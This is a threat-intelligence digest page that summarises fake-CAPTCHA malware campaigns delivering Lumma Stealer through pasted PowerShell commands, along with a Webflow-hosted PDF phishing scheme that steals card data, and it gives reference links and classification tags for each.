FlagThis - #captcha

A resurgence of a fake CAPTCHA malware campaign has been observed, with threat actors compromising widely used websites across various industries. They are embedding a fake CAPTCHA challenge that redirects victims to a site triggering PowerShell code execution. This campaign exploits social engineering tactics and fake software downloads to deceive users into executing malicious scripts.

This tactic is also utilized with fake captchas which resemble legitimate sites. When users attempt to pass the captcha, they are prompted to execute code that has been copied to their clipboard. The OBSCURE#BAT malware campaign is a major cybersecurity threat to both individuals and organizations, primarily due to its ability to compromise sensitive data through advanced evasion techniques, including API hooking. This allows the malware to hide files and registry entries, making detection difficult.


References :

• Arctic Wolf: Widespread Fake CAPTCHA Campaign Delivering Malware
• hackread.com: New OBSCURE#BAT Malware Targets Users with Fake Captchas
• Security Risk Advisors: 🚩 Fake CAPTCHA Malware Campaign Resurges With Multi-Stage PowerShell Infostealers
• SpiderLabs Blog: Resurgence of a Fake Captcha Malware Campaign
• www.zdnet.com: That weird CAPTCHA could be a malware trap - here's how to protect yourself
• Seceon Inc: Beware of Fake CAPTCHA Scams: How Cybercriminals Are Hijacking Your Clipboard to Steal Data
• www.cysecurity.news: Fake CAPTCHA Scams Trick Windows Users into Downloading Malware
• : Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT
• Broadcom Software Blogs: In a recent surge of sophisticated cyber threats, attackers are exploiting fake CAPTCHA verifications to hijack users’ clipboards, leading to the installation of information-stealing malware.
• Security Risk Advisors: ClearFake injects JavaScript to show fake CAPTCHAs on compromised sites, tricking users into running PowerShell for Lumma/Vidar malware.
• www.cisecurity.org: The CIS CTI team spotted a Lumma Stealer campaign where SLTT victims were redirected to malicious webpages delivering fake CAPTCHA verifications.
• gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
• Sucuri Blog: Sucuri Blog: Fake Cloudflare Verification Results in LummaStealer Trojan Infections
• securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites

Classification:

• HashTags: #Malware #FakeCaptcha #Infostealer
• Company: Google
• Target: Users
• Product: Google
• Feature: Malware Delivery
• Malware: Lumma
• Type: Malware
• Severity: Medium

Attackers are exploiting user familiarity with CAPTCHAs to distribute the Lumma Stealer RAT (Remote Access Trojan) via malicious PowerShell commands, according to recent findings. These campaigns involve tricking users into running PowerShell commands that ultimately install the Lumma Stealer. Attackers direct potential victims to attacker-controlled sites and prompt them to complete fake authentication challenges. These challenges often involve directing potential victims to malicious websites where they are prompted to complete verification steps, but instead of a CAPTCHA, it instructs them to press Windows + R and run a PowerShell command—under the false pretense of running “Windows Defender.”

These attacks leverage weaponized CAPTCHAs, with users being directed to malicious websites where they are prompted to complete verification steps. Upon completing these steps, users inadvertently copy and run PowerShell scripts that download and install malware, such as the Lumma Stealer. This allows the attackers to steal sensitive data like cryptocurrency wallets. The exploitation involves fake Cloudflare verification prompts, which lead users to execute malicious PowerShell commands to install the LummaStealer Trojan through infected WordPress sites, posing a significant threat.


References :

• gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
• securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites
• www.cisecurity.org: Active Lumma Stealer Campaign Impacting U.S. SLTTs
• : Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT

Classification:

• HashTags: #LummaStealer #RAT #Malware
• Company: HP
• Target: Users
• Product: Cloudflare
• Feature: CAPTCHA
• Malware: Lumma Stealer
• Type: Malware
• Severity: High

A sophisticated phishing campaign is underway, abusing the Webflow content delivery network (CDN) to steal credit card data and commit financial fraud. Attackers are hosting fake PDF documents on Webflow, embedded with CAPTCHA images and a real Cloudflare Turnstile CAPTCHA, to deceive users and evade detection by static scanners. This scheme targets individuals searching for documents on search engines, redirecting them to malicious PDFs.

These PDF files mimic a CAPTCHA challenge, prompting users to click and complete a genuine Cloudflare CAPTCHA, creating a false sense of security. Upon completion, victims are redirected to a page requesting personal and credit card details to "download" the supposed document. After entering their credit card details, users receive an error message, and repeated submissions lead to an HTTP 500 error page, while the attackers already have their information.


References :

• Talkback Resources: Hackers Use CAPTCHA Trick on Webflow CDN PDFs to Bypass Security Scanners [social]
• The Hacker News: The Hacker News article about hackers using CAPTCHA trick on Webflow CDN.
• securityonline.info: Sophisticated Phishing Campaign Abuses Webflow CDN to Steal Credit Card Data
• securityonline.info: SecurityOnline.info article about phishing campaign abusing Webflow CDN.

Classification:

• HashTags: #PhishingCampaign #WebflowCDN #CreditCardTheft
• Company: Webflow
• Target: credit card data
• Product: Webflow CDN
• Feature: captcha trick
• Malware: CAPTCHA Trick
• Type: Hack
• Severity: Medium